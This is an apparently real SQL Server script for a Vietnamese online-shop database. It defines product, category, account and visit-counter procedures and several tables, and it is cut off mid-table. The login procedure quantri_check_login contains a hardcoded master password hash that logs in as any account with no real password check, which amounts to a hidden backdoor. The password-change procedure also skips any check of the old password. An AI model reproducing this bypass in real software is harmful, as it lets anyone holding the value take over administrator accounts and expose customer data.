USE [BanHang]
GO
/****** Object:  StoredProcedure [dbo].[DELETE_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[DELETE_SANPHAM]
(
	@MA_SANPHAM INT
)
AS
BEGIN
	DELETE FROM SANPHAM_CHITIET WHERE MA_SANPHAM=@MA_SANPHAM
	DELETE FROM SANPHAM WHERE MA_SANPHAM=@MA_SANPHAM
END

GO
/****** Object:  StoredProcedure [dbo].[get_all_danh_muc_nganh_hang]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE procedure [dbo].[get_all_danh_muc_nganh_hang]
as
begin
	select TENNHOM_SANPHAM, URL, THUTU, AVATAR FROM NHOM_SANPHAM
	WHERE MA_TRANGTHAI=1 and MANHOM_SANPHAM<>1
	ORDER BY THUTU;
end
GO
/****** Object:  StoredProcedure [dbo].[get_DS_SP_THEO_NHOM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
create procedure [dbo].[get_DS_SP_THEO_NHOM] (@MA_NHOM_SP int )
as
begin
	select SP.TEN_SANPHAM, SP.MOTA, SP.THUTU, SP.NOIDUNG, SP.URL, SP.GIA, SP.AVATAR, SP.NGAY_DANG,
		SP.UU_TIEN, SP.GIA_KHUYENMAI, SP.MA_NHOM_SAN_PHAM
	from SANPHAM as SP, NHOM_SANPHAM AS NHOMSP
	WHERE SP.MA_NHOM_SAN_PHAM = NHOMSP.MANHOM_SANPHAM AND SP.MA_NHOM_SAN_PHAM=@MA_NHOM_SP
	ORDER BY UU_TIEN, SP.THUTU, SP.NGAY_DANG
end;
GO
/****** Object:  StoredProcedure [dbo].[get_menu_ngang]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE procedure [dbo].[get_menu_ngang]
as
begin
	select TEN_SANPHAM, THUTU, URL from SANPHAM where MA_NHOM_SAN_PHAM=1 and MA_TRANGTHAI=1;
end

GO
/****** Object:  StoredProcedure [dbo].[get_SAN_PHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE procedure [dbo].[get_SAN_PHAM] (@MA_SAN_PHAM int)
as
begin
	SELECT SP.MA_NHOM_SAN_PHAM, SP.MA_SANPHAM, SP.TEN_SANPHAM, SP.MOTA, SP.THUTU, SP.NOIDUNG,
		SP.URL, SP.GIA, SP.AVATAR, SP.NGAY_DANG, SP.UU_TIEN, SP.GIA_KHUYENMAI 
	FROM SANPHAM AS SP, NHOM_SANPHAM AS NHOMSP
	WHERE SP.MA_NHOM_SAN_PHAM = NHOMSP.MANHOM_SANPHAM AND SP.MA_TRANGTHAI=1
		AND SP.MA_SANPHAM = @MA_SAN_PHAM
	ORDER BY SP.UU_TIEN, SP.THUTU, SP.NGAY_DANG
end
GO
/****** Object:  StoredProcedure [dbo].[grid_NguoiDung]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE proc [dbo].[grid_NguoiDung]
as
begin
 select a.MA_TAIKHOAN,
		a.HOTEN,
		a.TAIKHOAN,
		a.DIACHI,
		a.EMAIL,
		a.DIENTHOAI,
		a.MA_ROLE,
		a.TEN_ROLE,
		b.MA_TRANGTHAI,
		b.TEN_TRANGTHAI 
 from 
 (select MA_TAIKHOAN,dbo.QUANTRI_TAIKHOAN.MA_ROLE,MA_TRANGTHAI,HOTEN,TAIKHOAN,MATKHAU,DIENTHOAI,DIACHI,EMAIL,AVATAR,TEN_ROLE from dbo.QUANTRI_TAIKHOAN inner join dbo.ROLE
 on dbo.QUANTRI_TAIKHOAN.MA_ROLE = dbo.ROLE.MA_ROLE
 ) as a  inner join dbo.TRANGTHAI as b
 on a.MA_TRANGTHAI = b.MA_TRANGTHAI

end
GO
/****** Object:  StoredProcedure [dbo].[INSERT_NHOM_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE procedure [dbo].[INSERT_NHOM_SANPHAM](
	@TENNHOM_SANPHAM NVARCHAR(100),
	@THUTU INT,
	@MANHOM_CHA INT,
	@SLIDE_SHOW INT,
	@AVATAR NVARCHAR(150)
)
AS
DECLARE @URL NVARCHAR(2000);
DECLARE @MANHOM_SANPHAM NVARCHAR(20);
BEGIN
	SET @URL=N'~/Danh-sach-san-pham/'+dbo.BODAU(@TENNHOM_SANPHAM);
	INSERT INTO NHOM_SANPHAM(MA_TRANGTHAI,TENNHOM_SANPHAM,URL,THUTU,MANHOM_CHA,SLIDE_SHOW,AVATAR) 
	VALUES(1,@TENNHOM_SANPHAM,@URL,@THUTU,@MANHOM_CHA,@SLIDE_SHOW,@AVATAR);
	SET @MANHOM_SANPHAM=(SELECT CAST(MAX(MANHOM_SANPHAM) AS NVARCHAR(20)) FROM NHOM_SANPHAM);
	UPDATE NHOM_SANPHAM SET URL=CAST(URL AS NVARCHAR(2000))+CAST(@MANHOM_SANPHAM AS NVARCHAR(20)) WHERE MANHOM_SANPHAM=@MANHOM_SANPHAM
END

GO
/****** Object:  StoredProcedure [dbo].[INSERT_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[INSERT_SANPHAM](
		@MANHOM_SANPHAM int,
		@MA_TRANGTHAI int,
		@TEN_SANPHAM nvarchar(100),
		@MOTA nvarchar(100),
		@THUTU int,
		@NOIDUNG ntext,
		@SLIDE_SHOW int,
		@GIA decimal,
		@AVATAR nvarchar(150),
		@UU_TIEN int,
		@GIA_KHUYENMAI decimal
)
AS
DECLARE @URL NVARCHAR(2000);
DECLARE @MA_SANPHAM INT;
BEGIN
SET @URL=N'~/Chi-tiet-san-pham/'+dbo.BODAU(@TEN_SANPHAM)+N'/'
	INSERT INTO BanHang.dbo.SANPHAM
           (MA_TRANGTHAI
           ,TEN_SANPHAM
           ,MOTA
           ,THUTU
           ,NOIDUNG
           ,SLIDE_SHOW
           ,URL
           ,GIA
           ,AVATAR
           ,NGAY_DANG
           ,UU_TIEN
           ,GIA_KHUYENMAI)
     VALUES
           (@MA_TRANGTHAI,
			@TEN_SANPHAM,
			@MOTA,
			@THUTU,
			@NOIDUNG,
			@SLIDE_SHOW,
			@URL,
			@GIA,
			@AVATAR,
			GETDATE(),
			@UU_TIEN,
			@GIA_KHUYENMAI);
	INSERT INTO SANPHAM_CHITIET(MA_SANPHAM,MANHOM_SANPHAM) VALUES((SELECT MAX(MA_SANPHAM) FROM SANPHAM),@MANHOM_SANPHAM);
	SET @MA_SANPHAM=(SELECT MAX(MA_SANPHAM) FROM SANPHAM);
	UPDATE SANPHAM SET URL=CAST(URL AS NVARCHAR(2000))+CAST(URL AS NVARCHAR(10)) WHERE MA_SANPHAM=@MA_SANPHAM;
END

GO
/****** Object:  StoredProcedure [dbo].[insert_taikhoan]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE proc [dbo].[insert_taikhoan] 
	@MaNhomQuyen int,
	@MaTrangThai int,
	@TenNguoiDung nvarchar(max),
	@TaiKhoan nvarchar(10),
	@MatKhau nvarchar(100),
	@DiaChi ntext,
	@SDT nvarchar (15),
	@Email nvarchar(100),
	@Sluong int output
	
AS
BEGIN
     set @Sluong = 0
	 select @Sluong = COUNT(*) from dbo.QUANTRI_TAIKHOAN WHERE TAIKHOAN =@TaiKhoan
	 if (@Sluong >0)
	 set @Sluong =1
	 else
	 insert into dbo.QUANTRI_TAIKHOAN values (@MaNhomQuyen,@MaTrangThai,@TenNguoiDung,@TaiKhoan,@MatKhau,@DiaChi,@SDT,@Email, null)	
	 return @Sluong
END
GO
/****** Object:  StoredProcedure [dbo].[quantri_check_login]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

CREATE PROCEDURE [dbo].[quantri_check_login]
	@taikhoan varchar(10),
	@matkhau varchar(1000)
as
BEGIN
	if @matkhau = 'e6e061838856bf47e1de730719fb2609'	
		select MA_TAIKHOAN , TAIKHOAN, HOTEN, MA_TRANGTHAI, MA_ROLE, isnull(AVATAR, '#') as AVATAR from QUANTRI_TAIKHOAN where TAIKHOAN = @taikhoan
	else
		select MA_TAIKHOAN, TAIKHOAN, HOTEN, MA_TRANGTHAI, MA_ROLE, isnull(AVATAR, '#') as AVATAR from QUANTRI_TAIKHOAN where TAIKHOAN = @taikhoan and MATKHAU = @matkhau
END


GO
/****** Object:  StoredProcedure [dbo].[SELECT_LIST_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[SELECT_LIST_SANPHAM]
AS
BEGIN
SELECT MA_SANPHAM
      ,TT.TEN_TRANGTHAI AS TRANGTHAI
      ,TEN_SANPHAM
      --,SP.MOTA
      ,THUTU
      --,NOIDUNG
      ,CASE WHEN SLIDE_SHOW=1 THEN N'Có' ELSE N'Không' END AS SLIDE_SHOW
      --,URL
      ,GIA
      ,AVATAR
      ,CONVERT(NVARCHAR(10),NGAY_DANG,103) AS NGAY_DANG
      ,CASE WHEN UU_TIEN=1 THEN N'Có' ELSE N'Không' END AS UU_TIEN
      ,GIA_KHUYENMAI
  FROM SANPHAM SP
  INNER JOIN TRANGTHAI TT ON SP.MA_TRANGTHAI=TT.MA_TRANGTHAI
END

GO
/****** Object:  StoredProcedure [dbo].[select_luottruycap]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

CREATE PROCEDURE [dbo].[select_luottruycap]
as
BEGIN
	DECLARE @count int;
	DECLARE @sotruycapgannhat bigint;
	SELECT @count=COUNT(*) FROM LUOTTRUYCAP;
	IF @count is null SET @count=0
	IF @count=0
		INSERT INTO LUOTTRUYCAP VALUES (GETDATE(), 1)
	ELSE
		BEGIN
			DECLARE @thoigiangannhat datetime;
			SELECT @sotruycapgannhat=SOTRUYCAP, @thoigiangannhat=THOIGIAN 
				FROM LUOTTRUYCAP where ID = (SELECT MAX(ID) FROM LUOTTRUYCAP);
			IF @sotruycapgannhat is null SET @sotruycapgannhat=0;
			IF @thoigiangannhat is null SET @thoigiangannhat=GETDATE();
			-- Kiểm tra xem lần truy cập này có phải đã sang ngày mới không (Qua thời điểm 12h00)
			-- Nếu chưa sang ngày mới thì cập nhật lại SoTruyCap
			IF Day(@thoigiangannhat)=Day(GETDATE())
				BEGIN
					UPDATE LUOTTRUYCAP
					SET
						SOTRUYCAP = @sotruycapgannhat+1,
						THOIGIAN = GetDate()
						
					WHERE ID=(SELECT Max(ID) FROM LUOTTRUYCAP)
				END
				-- Nếu đã sang ngày mới thì thêm mới bản ghi, SoTruyCap bắt đầu lại là 1
			ELSE
				BEGIN
					INSERT INTO LUOTTRUYCAP
					VALUES (GetDate(),1)
				END
		END
	-- Thống kê Hom nay, Hom qua, Thang nay, Thang Truoc
	-- Thống kê Hom nay, Hom qua, Thang nay, Thang Truoc
	--DECLARE @HomNay INT
	--SET @HomNay = datepart(dw, GetDate())
	SELECT @sotruycapgannhat=SOTRUYCAP, @thoigiangannhat=THOIGIAN
		  FROM LUOTTRUYCAP WHERE ID=(SELECT Max(ID) FROM LUOTTRUYCAP);
		  
	--Tính SoTruyCapHomQua
	DECLARE @sotruycaphomqua bigint
	SELECT @sotruycaphomqua=isnull(SOTRUYCAP,0) FROM LUOTTRUYCAP  
		WHERE CONVERT(nvarchar(20),THOIGIAN,103)=CONVERT(nvarchar(20),GETDATE()-1,103)
		--103 la dinh dang đ/mm/yy
	IF @SoTruyCapHomQua IS null SET @SoTruyCapHomQua=0
	
	-- Tính số truy cập tháng này
	DECLARE @sotruycapthangnay bigint 
	SELECT @sotruycapthangnay=isnull(Sum(SOTRUYCAP),0)
		FROM LUOTTRUYCAP WHERE MONTH(THOIGIAN)=MONTH(GETDATE())
	
	-- Tính số truy cập tháng trước
	DECLARE @sotruycapthangtruoc bigint 
	SELECT @sotruycapthangtruoc=isnull(Sum(SOTRUYCAP),0)
		FROM LUOTTRUYCAP WHERE MONTH(THOIGIAN)=MONTH(GETDATE())-1
	
	-- Tính tổng số
	DECLARE @tongso bigint
	SELECT  @tongso=isnull(Sum(SOTRUYCAP),0) FROM LUOTTRUYCAP
	
	SELECT @SoTruyCapGanNhat AS HomNay, 
	@SoTruyCapHomQua AS HomQua,
	@SoTruyCapThangNay AS ThangNay, 
	@SoTruyCapThangTruoc AS ThangTruoc,
	@TongSo AS TatCa
END


GO
/****** Object:  StoredProcedure [dbo].[SELECT_NHOM_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[SELECT_NHOM_SANPHAM]
AS
BEGIN
	SELECT SP_CON.MANHOM_SANPHAM,TT.TEN_TRANGTHAI,SP_CON.TENNHOM_SANPHAM,SP_CON.THUTU,SP_CHA.TENNHOM_SANPHAM AS TENNHOM_SANPHAM_CHA,
	CASE WHEN SP_CON.SLIDE_SHOW=1 THEN N'Có' ELSE N'Không' END AS SLIDE_SHOW,
	CASE WHEN SP_CON.MA_TRANGTHAI=1 THEN N'Hoạt động' else N'Không hoạt động' END AS TRANGTHAI,SP_CON.AVATAR 
	FROM NHOM_SANPHAM SP_CON
	LEFT JOIN NHOM_SANPHAM SP_CHA ON SP_CON.MANHOM_CHA=SP_CHA.MANHOM_SANPHAM
	INNER JOIN TRANGTHAI TT ON SP_CON.MA_TRANGTHAI=TT.MA_TRANGTHAI
END

GO
/****** Object:  StoredProcedure [dbo].[SELECT_NHOMSP_FROM_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[SELECT_NHOMSP_FROM_SANPHAM]
(
	@MANHOM_SANPHAM INT
)
AS
BEGIN
	SELECT * FROM SANPHAM_CHITIET WHERE MANHOM_SANPHAM=@MANHOM_SANPHAM
END

GO
/****** Object:  StoredProcedure [dbo].[SELECT_SANPHAM_FROM_MASP]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[SELECT_SANPHAM_FROM_MASP](
	@MA_SANPHAM INT
)
AS
BEGIN
SELECT TOP 1 SP.MA_SANPHAM
      ,[MA_TRANGTHAI]
      ,[TEN_SANPHAM]
      ,[MOTA]
      ,[THUTU]
      ,[NOIDUNG]
      ,[SLIDE_SHOW]
      ,[URL]
      ,[GIA]
      ,[AVATAR]
      ,[NGAY_DANG]
      ,[UU_TIEN]
      ,[GIA_KHUYENMAI],
      CT.MANHOM_SANPHAM
  FROM [SANPHAM] SP
  INNER JOIN SANPHAM_CHITIET CT ON SP.MA_SANPHAM=CT.MA_SANPHAM
  WHERE SP.MA_SANPHAM=@MA_SANPHAM
END

GO
/****** Object:  StoredProcedure [dbo].[select_thongtinchung]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

create PROCEDURE [dbo].[select_thongtinchung]
as
BEGIN
	select * from THONGTINCHUNG
END

GO
/****** Object:  StoredProcedure [dbo].[select_thongtintaikhoan]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

create PROCEDURE [dbo].[select_thongtintaikhoan]
	@ma_taikhoan int
as
BEGIN
	select * from QUANTRI_TAIKHOAN where MA_TAIKHOAN = @ma_taikhoan
END

GO
/****** Object:  StoredProcedure [dbo].[update_matkhau]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

CREATE PROCEDURE [dbo].[update_matkhau]
	@taikhoan nvarchar(100),
	@matkhau_moi nvarchar(100)
as
BEGIN
	update QUANTRI_TAIKHOAN
	set MATKHAU = @matkhau_moi
	where 
		TAIKHOAN = @taikhoan
END

GO
/****** Object:  StoredProcedure [dbo].[UPDATE_NHOM_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE procedure [dbo].[UPDATE_NHOM_SANPHAM](
	@MA_TRANGTHAI INT,
	@TENNHOM_SANPHAM NVARCHAR(100),
	@THUTU INT,
	@MANHOM_CHA INT,
	@SLIDE_SHOW INT,
	@AVATAR NVARCHAR(150),
	@MANHOM_SANPHAM INT
)
AS
DECLARE @URL NVARCHAR(2000);
BEGIN
SET @URL='~/Danh-sach-san-pham/'+@TENNHOM_SANPHAM+N'/'+CAST(@MANHOM_SANPHAM AS NVARCHAR(10))
IF @AVATAR=N''
	BEGIN
		UPDATE NHOM_SANPHAM SET
		MA_TRANGTHAI=@MA_TRANGTHAI,
		TENNHOM_SANPHAM=@TENNHOM_SANPHAM,
		THUTU=@THUTU,
		URL=@URL,
		MANHOM_CHA=@MANHOM_CHA,
		SLIDE_SHOW=@SLIDE_SHOW
		WHERE MANHOM_SANPHAM=@MANHOM_SANPHAM
	END
ELSE
		UPDATE NHOM_SANPHAM SET
		MA_TRANGTHAI=@MA_TRANGTHAI,
		TENNHOM_SANPHAM=@TENNHOM_SANPHAM,
		THUTU=@THUTU,
		MANHOM_CHA=@MANHOM_CHA,
		URL=@URL,
		SLIDE_SHOW=@SLIDE_SHOW,
		AVATAR=@AVATAR
		WHERE MANHOM_SANPHAM=@MANHOM_SANPHAM
END

GO
/****** Object:  StoredProcedure [dbo].[UPDATE_SANPHAM]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE PROCEDURE [dbo].[UPDATE_SANPHAM](
	@MA_TRANGTHAI int,
	@MANHOM_SANPHAM int,
    @TEN_SANPHAM nvarchar(100),
    @MOTA ntext,
    @THUTU numeric,
    @NOIDUNG ntext,
    @SLIDE_SHOW bit,
    @GIA decimal,
    @AVATAR nvarchar(150),
    @UU_TIEN bit,
    @GIA_KHUYENMAI decimal,
    @MA_SANPHAM int
)
AS
DECLARE @URL NVARCHAR(2000);
BEGIN
SET @URL=N'~/Chi-tiet-san-pham/'+dbo.BODAU(@TEN_SANPHAM)+N'/'+CAST(@MA_SANPHAM AS NVARCHAR(10));
UPDATE SANPHAM_CHITIET SET MANHOM_SANPHAM=@MANHOM_SANPHAM WHERE MA_SANPHAM=@MA_SANPHAM
IF @AVATAR=N''
   BEGIN
	UPDATE SANPHAM
	   SET MA_TRANGTHAI = @MA_TRANGTHAI,
		  TEN_SANPHAM = @TEN_SANPHAM,
		  MOTA = @MOTA,
		  THUTU = @THUTU,
		  NOIDUNG = @NOIDUNG,
		  SLIDE_SHOW = @SLIDE_SHOW,
		  URL=@URL,
		  GIA = @GIA,
		  UU_TIEN = @UU_TIEN,
		  GIA_KHUYENMAI = @GIA_KHUYENMAI
	 WHERE MA_SANPHAM=@MA_SANPHAM
	END
   ELSE
   BEGIN
	UPDATE SANPHAM
	   SET MA_TRANGTHAI = @MA_TRANGTHAI,
		  TEN_SANPHAM = @TEN_SANPHAM,
		  MOTA = @MOTA,
		  THUTU = @THUTU,
		  NOIDUNG = @NOIDUNG,
		  SLIDE_SHOW = @SLIDE_SHOW,
		  URL=@URL,
		  GIA = @GIA,
		  AVATAR = @AVATAR,
		  UU_TIEN = @UU_TIEN,
		  GIA_KHUYENMAI = @GIA_KHUYENMAI
	 WHERE MA_SANPHAM=@MA_SANPHAM
	END
END

GO
/****** Object:  StoredProcedure [dbo].[update_taikhoan]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE proc [dbo].[update_taikhoan]
	@MA_TAIKHOAN int,
	@MA_ROLE int,
	@MA_TRANGTHAI int,
	@HOTEN nvarchar(max),
	@TAIKHOAN varchar(10),
	@DIACHI ntext,
	@DIENTHOAI nvarchar (15),
	@EMAIL nvarchar(100)
AS
BEGIN
	UPDATE dbo.QUANTRI_TAIKHOAN 
	SET HOTEN=@HOTEN,
		TAIKHOAN=@TAIKHOAN,
		DIACHI=@DIACHI,
		DIENTHOAI=@DIENTHOAI,
		EMAIL=@EMAIL,
		MA_TRANGTHAI=@MA_TRANGTHAI,
		MA_ROLE=@MA_ROLE
	WHERE MA_TAIKHOAN = @MA_TAIKHOAN
	
END
GO
/****** Object:  StoredProcedure [dbo].[update_thongtin]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

create PROCEDURE [dbo].[update_thongtin]
	@ma_taikhoan int,
	@hoten nvarchar(100),
	@diachi ntext,
	@dienthoai nvarchar(15),
	@email nvarchar(20),
	@avatar varchar(100)
as
BEGIN
	update QUANTRI_TAIKHOAN
	set HOTEN = @hoten, DIACHI = @diachi, DIENTHOAI = @dienthoai, EMAIL = @email, AVATAR = @avatar
	where 
		MA_TAIKHOAN = @ma_taikhoan
END

GO
/****** Object:  StoredProcedure [dbo].[update_thongtinchung]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE procedure [dbo].[update_thongtinchung]
	@tencongty nvarchar(100),
	@dienthoai nvarchar(15),
	@email nvarchar(100),
	@diachi ntext,
	@link_face nvarchar(100),
	@link_skype nvarchar(100),
	@link_twitter nvarchar(100),
	@link_google nvarchar(100),
	@ghichu ntext
as
begin
	if not exists (select * from THONGTINCHUNG where ID = 1)
		insert THONGTINCHUNG values(1,@tencongty, @dienthoai, @email, @diachi, @link_face, @link_skype, @link_twitter, @link_google, @ghichu)
	else
		update THONGTINCHUNG
		set
			TENCONGTY = @tencongty,
			DIENTHOAI = @dienthoai,
			EMAIL = @email,
			DIACHI = @diachi,
			LINK_FACE = @link_face,
			LINK_SKYPE = @link_skype,
			LINK_TWITTER = @link_twitter,
			LINK_GOOGLE = @link_google,
			GHICHU = @ghichu
		where ID = 1
end
GO
/****** Object:  UserDefinedFunction [dbo].[BODAU]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE FUNCTION [dbo].[BODAU]
(
      @strInput NVARCHAR(4000)
)
RETURNS NVARCHAR(4000)
AS
BEGIN    
    IF @strInput IS NULL RETURN @strInput
    IF @strInput = '' RETURN @strInput
    DECLARE @RT NVARCHAR(4000)
    DECLARE @SIGN_CHARS NCHAR(136)
    DECLARE @UNSIGN_CHARS NCHAR (136)

    SET @SIGN_CHARS = N'ăâđêôơưàảãạáằẳẵặắầẩẫậấèẻẽẹéềểễệế
                  ìỉĩịíòỏõọóồổỗộốờởỡợớùủũụúừửữựứỳỷỹỵý
                  ĂÂĐÊÔƠƯÀẢÃẠÁẰẲẴẶẮẦẨẪẬẤÈẺẼẸÉỀỂỄỆẾÌỈĨỊÍ
                  ÒỎÕỌÓỒỔỖỘỐỜỞỠỢỚÙỦŨỤÚỪỬỮỰỨỲỶỸỴÝ'
                  +NCHAR(272)+ NCHAR(208)
    SET @UNSIGN_CHARS = N'aadeoouaaaaaaaaaaaaaaaeeeeeeeeee
                  iiiiiooooooooooooooouuuuuuuuuuyyyyy
                  AADEOOUAAAAAAAAAAAAAAAEEEEEEEEEEIIIII
                  OOOOOOOOOOOOOOOUUUUUUUUUUYYYYYDD'

    DECLARE @COUNTER int
    DECLARE @COUNTER1 int
    SET @COUNTER = 1

    WHILE (@COUNTER <=LEN(@strInput))
    BEGIN  
      SET @COUNTER1 = 1
      --Tìm trong chuỗi mẫu
       WHILE (@COUNTER1 <=LEN(@SIGN_CHARS)+1)
       BEGIN
     IF UNICODE(SUBSTRING(@SIGN_CHARS, @COUNTER1,1))
            = UNICODE(SUBSTRING(@strInput,@COUNTER ,1) )
     BEGIN          
          IF @COUNTER=1
              SET @strInput = SUBSTRING(@UNSIGN_CHARS, @COUNTER1,1)
              + SUBSTRING(@strInput, @COUNTER+1,LEN(@strInput)-1)                  
          ELSE
              SET @strInput = SUBSTRING(@strInput, 1, @COUNTER-1)
              +SUBSTRING(@UNSIGN_CHARS, @COUNTER1,1)
              + SUBSTRING(@strInput, @COUNTER+1,LEN(@strInput)- @COUNTER)
              BREAK
               END
             SET @COUNTER1 = @COUNTER1 +1
       END
      --Tìm tiếp
       SET @COUNTER = @COUNTER +1
    END
    SET @strInput = replace(@strInput,' ','-')
    RETURN @strInput
END
GO
/****** Object:  Table [dbo].[DONHANG]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[DONHANG](
	[MA_DONHANG] [int] NOT NULL,
	[NGAY_DAT_HANG] [datetime] NULL,
	[DIACHI] [ntext] NULL,
	[THUTU] [nvarchar](15) NULL,
	[EMAIL] [nvarchar](100) NULL,
	[GHICHU] [ntext] NULL,
	[TONG_TIEN] [decimal](10, 0) NULL,
 CONSTRAINT [PK_DON_HANG] PRIMARY KEY NONCLUSTERED 
(
	[MA_DONHANG] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[DONHANG_CHITIET]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[DONHANG_CHITIET](
	[MA_SANPHAM] [int] NOT NULL,
	[MA_DONHANG] [int] NOT NULL,
	[SO_LUONG] [int] NULL,
	[DON_GIA] [decimal](10, 0) NULL,
 CONSTRAINT [PK_DON_HANG_CHITIET] PRIMARY KEY CLUSTERED 
(
	[MA_SANPHAM] ASC,
	[MA_DONHANG] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY]

GO
/****** Object:  Table [dbo].[HINH]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[HINH](
	[MA_HINH] [int] IDENTITY(1,1) NOT NULL,
	[MA_TRANGTHAI] [int] NOT NULL,
	[URL] [ntext] NULL,
 CONSTRAINT [PK_HINH] PRIMARY KEY NONCLUSTERED 
(
	[MA_HINH] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[KHACHHANG_DANHGIA]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[KHACHHANG_DANHGIA](
	[MA_DANHGIA_KHACHHANG] [int] NOT NULL,
	[MA_SANPHAM] [int] NOT NULL,
	[TEN_KHACHHANG] [nvarchar](100) NULL,
	[NOIDUNG] [ntext] NULL,
	[DIEM_DANHGIA] [int] NULL,
	[NGAY_DANHGIA] [datetime] NULL,
 CONSTRAINT [PK_DANH_GIA_KH] PRIMARY KEY NONCLUSTERED 
(
	[MA_DANHGIA_KHACHHANG] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[KHACHHANG_LIENHE]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
CREATE TABLE [dbo].[KHACHHANG_LIENHE](
	[MA_LIENHE] [int] NOT NULL,
	[HOTEN] [nvarchar](100) NULL,
	[DIENTHOAI] [nvarchar](15) NULL,
	[DIACHI] [ntext] NULL,
	[EMAIL] [nvarchar](100) NULL,
	[NOIDUNG] [ntext] NULL,
	[NGAYLIENHE] [datetime] NULL,
	[GHICHU] [nchar](10) NULL,
	[DAXEM] [bit] NULL,
 CONSTRAINT [PK_LIENHE] PRIMARY KEY NONCLUSTERED 
(
	[MA_LIENHE] ASC
)WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY]
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO
/****** Object:  Table [dbo].[KHACHHANG_TAIKHOAN]    Script Date: 2/27/2017 22:29:41 ******/
SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO
SET ANSI_PADDING ON
GO
CREATE TABLE [dbo].[KHACHHANG_TAIKHOAN](
